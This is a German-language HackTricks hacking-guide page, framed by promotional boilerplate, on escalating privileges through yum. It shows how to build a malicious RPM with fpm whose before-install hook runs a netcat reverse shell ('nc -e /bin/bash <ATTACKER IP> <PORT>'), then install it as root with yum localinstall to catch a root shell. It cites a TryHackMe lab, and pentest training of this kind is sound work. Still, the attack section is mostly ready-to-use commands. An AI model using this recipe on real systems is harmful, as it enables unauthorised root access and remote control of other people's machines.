4.1 KiB
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repositories senden.
Weitere Beispiele rund um yum finden Sie auch auf gtfobins.
Ausführen beliebiger Befehle über RPM-Pakete
Überprüfen der Umgebung
Um diesen Vektor zu nutzen, muss der Benutzer yum-Befehle als privilegierter Benutzer, d.h. als root, ausführen können.
Ein funktionierendes Beispiel für diesen Vektor
Ein funktionierendes Beispiel für diesen Exploit finden Sie im Raum daily bugle auf tryhackme.
Verpacken eines RPM
Im folgenden Abschnitt werde ich das Verpacken einer Reverse-Shell in ein RPM mit Hilfe von fpm behandeln.
Das folgende Beispiel erstellt ein Paket, das einen before-install Trigger mit einem beliebigen Skript enthält, das vom Angreifer definiert werden kann. Beim Installieren dieses Pakets wird der beliebige Befehl ausgeführt. Ich habe ein einfaches Beispiel für eine Reverse-Netcat-Shell zur Demonstration verwendet, aber dies kann bei Bedarf geändert werden.
EXPLOITDIR=$(mktemp -d)
CMD='nc -e /bin/bash <ATTACKER IP> <PORT>'
RPMNAME="exploited"
echo $CMD > $EXPLOITDIR/beforeinstall.sh
fpm -n $RPMNAME -s dir -t rpm -a all --before-install $EXPLOITDIR/beforeinstall.sh $EXPLOITDIR
Einen Shell abfangen
Unter Verwendung des obigen Beispiels und unter der Annahme, dass yum
als Benutzer mit höheren Berechtigungen ausgeführt werden kann.
- Übertragen Sie das RPM auf den Host.
- Starten Sie einen Listener auf Ihrem lokalen Host, wie z.B. den Beispiel-Netcat-Listener.
- Installieren Sie das verwundbare Paket mit
yum localinstall -y exploited-1.0-1.noarch.rpm
.
Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!
Andere Möglichkeiten, HackTricks zu unterstützen:
- Wenn Sie Ihr Unternehmen in HackTricks bewerben möchten oder HackTricks als PDF herunterladen möchten, überprüfen Sie die ABONNEMENTPLÄNE!
- Holen Sie sich das offizielle PEASS & HackTricks-Merchandise
- Entdecken Sie The PEASS Family, unsere Sammlung exklusiver NFTs
- Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @carlospolopm.
- Teilen Sie Ihre Hacking-Tricks, indem Sie Pull Requests an die HackTricks und HackTricks Cloud GitHub-Repositories senden.